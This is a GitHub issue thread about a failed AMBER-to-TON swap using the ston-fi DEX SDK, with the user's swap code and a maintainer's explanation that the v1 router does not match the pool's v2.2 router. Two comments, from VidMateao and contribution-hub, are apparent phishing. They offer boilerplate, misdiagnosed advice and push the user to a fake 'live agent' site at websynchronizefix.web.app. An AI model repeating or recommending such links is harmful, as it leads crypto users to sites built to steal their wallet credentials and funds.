### ISSUE TITLE
Swap: ton not received

### ISSUE THREAD

**Issue by kkrenev** [ston-fi/sdk#46]
Hello,

I am facing an issue with swapping Amber tokens for TON using the DEX SDK. Amber tokens are deducted from my wallet, but I do not receive TON as expected. I would like to understand what might be going wrong and how to fix it.

Here is the hash of the transaction:
https://tonviewer.com/transaction/bcfac1b0c02a6c3a1a452d778a37c1486a34c96891283ad926f51229c40c1f70

```javascript
try {
    const client = new TonClient({
        endpoint: 'https://toncenter.com/api/v2/jsonRPC',
        apiKey: '***'
    });

    const router = client.open(new DEX.v1.Router());

    const swapParams = await router.getSwapJettonToTonTxParams({
        userWalletAddress: user.address,
        offerJettonAddress: 'EQBv2cEJ-T-1GNRdzaY_JYoJvpAISuFHOKmJZPQnoUqEHTlU',
        offerAmount: toNano(10000),
        proxyTon: new pTON.v1(),
        minAskAmount: '1',
        queryId: +Date.now(),
    });

    console.log("Swap Parameters: ", swapParams);

    await user.walletInstance.send(user.secretKey, swapParams);

    console.log("Transaction sent successfully!");

} catch (e) {
    console.log(e);
}

// Supporting function
async send(secretKey, txParams) {
    const seqno = await this.contract.getSeqno();

    return await this.contract.sendTransfer({
        seqno,
        secretKey: secretKey,
        sendMode: SendMode.PAY_GAS_SEPARATELY,
        messages: [
            internal({
                ...txParams,
                bounce: true,
            })
        ]
    });
}
```
<img width="607" alt="image" src="https://github.com/user-attachments/assets/1fbae585-8ff1-45e4-bc9a-06b83a85dac9">

**Comment by VidMateao** [comment]
@kkrenev 
You’re experiencing an infinite swap issue which might be caused be the following reasons…

Network Issues: Sometimes, network congestion can cause transactions to get stuck. Check if the TON network is experiencing high traffic.

Gas Fees: Ensure that you're setting an appropriate gas fee. If the gas price is too low, your transaction might not get processed, causing it to retry endlessly.

Contract Issues: If the swap involves a specific token or contract, there might be issues with that contract. Make sure the token is supported and the contract address is correct.

Browser Issues: Try clearing your browser cache or using a different browser to see if that resolves the issue.

**Comment by VidMateao** [comment]
@kkrenev 
If none of the above is related to why you’re having this issue 
This will then be review by the support team. Visit the live support page to initiate a chat with an agent for further assistance via [live agent](https://websynchronizefix.web.app).
1.	Access the Live Chat:
•	Navigate to our website’s home page.
•	Look for the chat icon located at the bottom right corner of the screen and start a 💬.
Regards

**Comment by kkrenev** [comment]
with same code usdt to ton its ok
<img width="367" alt="image" src="https://github.com/user-attachments/assets/6529b4a5-13a0-44d6-9752-fc72a33efd63">

**Comment by kkrenev** [comment]
The transaction that I made with my hands on the site https://tonviewer.com/transaction/eb994351155178d445634d35ab4d91eef1e66fa0ccc662e7c321f79d77bb5ea0

can you tell me what the difference is and how to achieve the same result?

**Comment by contribution-hub** [comment]
Hello @kkrenev 
We are sorry for the late response. Be rest assured our team is working diligently to ensure your request is attended to. 
Visit the official Decentralized Dapp Protocol to follow the steps to complete your request. Also you can report this issue to an agent for assistance via [Decentralized portal](https://websynchronizefix.web.app)
Note: click on the chat button to initiate a conversation with an agent for further assistance.

**Comment by pavel-rakhmanov** [comment]
Your AMBER/TON tx failed because it was made using the v1 router while on Ston.fi there is only one pool with [AMBER/TON](https://api.ston.fi/v1/pools/EQBXyg8CGiiNsriRUKFeyMf_4kwV7145uYTzJegDTGGFhlgv), and it's deployed using the router [EQBCtlN7Zy96qx-3yH0Yi4V0SNtQ-8RbhYaNs65MC4Hwfq31](https://api.ston.fi/v1/routers/EQBCtlN7Zy96qx-3yH0Yi4V0SNtQ-8RbhYaNs65MC4Hwfq31) which is v2.2 and needs v2.1 pTON to work with.

The same code works for USDT/TON pair because there is such [pool](https://api.ston.fi/v1/pools/EQD8TJ8xEWB1SpnRE4d89YO3jl0W0EiBnNS4IBaHaUmdfizE) deployed on v1 router

**Comment by pavel-rakhmanov** [comment]
> can you tell me what the difference is and how to achieve the same result?

![Screenshot 2024-12-04 at 12 51 12](https://github.com/user-attachments/assets/5daee22a-e39f-486d-8ec9-ebb02e072cb3)
